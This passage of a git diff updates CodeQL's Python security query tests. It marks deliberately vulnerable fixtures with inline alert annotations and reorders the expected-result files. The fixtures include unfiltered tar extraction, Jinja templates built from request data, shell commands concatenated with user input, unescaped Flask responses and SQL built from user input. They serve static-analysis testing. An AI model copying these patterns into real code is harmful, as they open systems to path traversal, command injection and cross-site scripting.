| +| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | edges | tarslip.py:14:1:14:3 | ControlFlowNode for tar | tarslip.py:15:1:15:3 | ControlFlowNode for tar | provenance | | | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:14:1:14:3 | ControlFlowNode for tar | provenance | | @@ -54,13 +64,3 @@ nodes | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tarslip.py:113:24:113:26 | ControlFlowNode for tar | semmle.label | ControlFlowNode for tar | subpaths -#select -| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref index cfede0c92b21..c9b6b9f4f069 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref @@ -1 +1,2 @@ -Security/CWE-022/TarSlip.ql +query: Security/CWE-022/TarSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py b/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py index 2c06d01adfd5..616c93043f7a 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py @@ -11,13 +11,13 @@ for entry in tar: tar.extract(entry) -tar = tarfile.open(unsafe_filename_tar) -tar.extractall() +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall() # $ Alert tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: - tar.extract(entry) + tar.extract(entry) # $ Alert tar = tarfile.open(safe_filename_tar) tar.extractall() @@ -32,15 +32,15 @@ tar.extract(entry, "/tmp/unpack/") #Part Sanitized -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: if ".." in entry.name: raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert #Unsanitized members -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(members=tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(members=tar) # $ Alert #Sanitize members @@ -55,10 +55,10 @@ def safemembers(members): # Wrong sanitizer (is missing not) -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: if os.path.isabs(entry.name) or ".." in entry.name: - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert # OK Sanitized using not @@ -87,13 +87,13 @@ def safemembers(members): extraction_filter = "fully_trusted" -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(filter=extraction_filter) # unsafe # $ Alert tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: - tar.extract(entry, filter=extraction_filter) # unsafe + tar.extract(entry, filter=extraction_filter) # unsafe # $ Alert extraction_filter = "data" @@ -106,11 +106,11 @@ def safemembers(members): tar.extract(entry, filter=extraction_filter) # safe extraction_filter = None -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(filter=extraction_filter) # unsafe # $ Alert -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(members=tar, filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(members=tar, filter=extraction_filter) # unsafe # $ Alert tar = tarfile.open(unsafe_filename_tar) tar.extractall(members=safemembers(tar), filter=extraction_filter) # safe -- we assume `safemembers` makes up for the unsafe filter diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py index f1fe834e4936..0dad4e31f645 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py @@ -4,21 +4,21 @@ from jinja2 import Environment, DictLoader, escape -def a(request): +def a(request): # $ Source # Load the template template = request.GET['template'] - t = Template(template) # BAD: Template constructed from user input + t = Template(template) # BAD: Template constructed from user input # $ Alert name = request.GET['name'] # Render the template with the context data html = t.render(name=escape(name)) return HttpResponse(html) -def b(request): +def b(request): # $ Source import jinja2 # Load the template template = request.GET['template'] env = Environment() - t = env.from_string(template) # BAD: Template constructed from user input + t = env.from_string(template) # BAD: Template constructed from user input # $ Alert name = request.GET['name'] # Render the template with the context data html = t.render(name=escape(name)) diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index f92107728395..a4bf57e174c1 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected @@ -1,3 +1,6 @@ +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | edges | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | @@ -11,6 +14,3 @@ nodes | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths -#select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref index ead6bb469c6a..818407e3eb80 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref @@ -1 +1,2 @@ -Security/CWE-074/TemplateInjection.ql \ No newline at end of file +query: Security/CWE-074/TemplateInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected index 563a0ac74aec..99941d47b288 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected @@ -1,3 +1,13 @@ +#select +| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | edges | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:5:26:5:32 | ControlFlowNode for request | provenance | | | command_injection.py:5:26:5:32 | ControlFlowNode for request | command_injection.py:18:13:18:19 | ControlFlowNode for request | provenance | | @@ -30,13 +40,3 @@ nodes | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths -#select -| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref index e38b88f29197..8d677af35712 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/CommandInjection.ql +query: Security/CWE-078/CommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py index 09dd2bf97168..676215f29d1b 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py @@ -2,7 +2,7 @@ import platform import popen2 -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -16,14 +16,14 @@ def python2_specific(): """ files = request.args.get("files", "") - os.popen2("ls " + files) - os.popen3("ls " + files) - os.popen4("ls " + files) + os.popen2("ls " + files) # $ Alert + os.popen3("ls " + files) # $ Alert + os.popen4("ls " + files) # $ Alert - platform.popen("ls " + files) + platform.popen("ls " + files) # $ Alert - popen2.popen2("ls " + files) - popen2.popen3("ls " + files) - popen2.popen4("ls " + files) - popen2.Popen3("ls " + files) - popen2.Popen4("ls " + files) + popen2.popen2("ls " + files) # $ Alert + popen2.popen3("ls " + files) # $ Alert + popen2.popen4("ls " + files) # $ Alert + popen2.Popen3("ls " + files) # $ Alert + popen2.Popen4("ls " + files) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref index e38b88f29197..47dd63a884ea 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref @@ -1 +1 @@ -Security/CWE-078/CommandInjection.ql +query: Security/CWE-078/CommandInjection.ql diff --git a/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index fdc01b9ecbf7..6d6ee0abf7d8 100644 --- a/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1 @@ -Security/CWE-078/UnsafeShellCommandConstruction.ql +query: Security/CWE-078/UnsafeShellCommandConstruction.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref index 9fefcf4a030d..d63a6068dc22 100644 --- a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref +++ b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref @@ -1 +1,2 @@ -Security/CWE-079/Jinja2WithoutEscaping.ql +query: Security/CWE-079/Jinja2WithoutEscaping.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py index aed840ce8863..4c63f5b5fd61 100644 --- a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py +++ b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py @@ -6,7 +6,7 @@ app = Flask(__name__) loader = FileSystemLoader( searchpath="templates/" ) -unsafe_env = Environment(loader=loader) +unsafe_env = Environment(loader=loader) # $ Alert safe1_env = Environment(loader=loader, autoescape=True) safe2_env = Environment(loader=loader, autoescape=select_autoescape()) @@ -38,18 +38,18 @@ def safe2(): auto = select_autoescape e = Environment(autoescape=auto) # GOOD z = 0 -e = Environment(autoescape=z) # BAD +e = Environment(autoescape=z) # BAD # $ Alert E = Environment -E() # BAD -E(autoescape=z) # BAD +E() # BAD # $ Alert +E(autoescape=z) # BAD # $ Alert E(autoescape=auto) # GOOD E(autoescape=0+1) # GOOD def checked(cond=False): if cond: - e = Environment(autoescape=cond) # GOOD + e = Environment(autoescape=cond) # GOOD # $ Alert -unsafe_tmpl = Template('Hello {{ name }}!') +unsafe_tmpl = Template('Hello {{ name }}!') # $ Alert safe1_tmpl = Template('Hello {{ name }}!', autoescape=True) safe2_tmpl = Template('Hello {{ name }}!', autoescape=select_autoescape()) diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected index d332231e0c99..bf4f584c8157 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected @@ -1,3 +1,7 @@ +#select +| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | provenance | | | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | reflected_xss.py:9:18:9:24 | ControlFlowNode for request | provenance | | @@ -28,7 +32,3 @@ nodes | reflected_xss.py:27:23:27:29 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref index e0efe1024162..9cd0122e556e 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/ReflectedXss.ql +query: Security/CWE-079/ReflectedXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py index 98682f04f3cb..8c78cc07ba1b 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py @@ -1,5 +1,5 @@ import json -from flask import Flask, request, make_response, escape, jsonify +from flask import Flask, request, make_response, escape, jsonify # $ Source app = Flask(__name__) @@ -7,7 +7,7 @@ @app.route("/unsafe") def unsafe(): first_name = request.args.get("name", "") - return make_response("Your name is " + first_name) # NOT OK + return make_response("Your name is " + first_name) # NOT OK # $ Alert @app.route("/safe") @@ -19,13 +19,13 @@ def safe(): @app.route("/unsafe/json") def unsafe_json(): data = json.loads(request.data) - return make_response(json.dumps(data)) # NOT OK + return make_response(json.dumps(data)) # NOT OK # $ Alert @app.route("/safe/json") def safe_json(): data = json.loads(request.data) - return make_response(json.dumps(data), 200, {'Content-Type': 'application/json'}) # OK, FP + return make_response(json.dumps(data), 200, {'Content-Type': 'application/json'}) # OK, FP # $ Alert @app.route("/jsonify") diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected index 9ff8b1d718c1..c1958c23858d 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected @@ -1,3 +1,20 @@ +#select +| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | 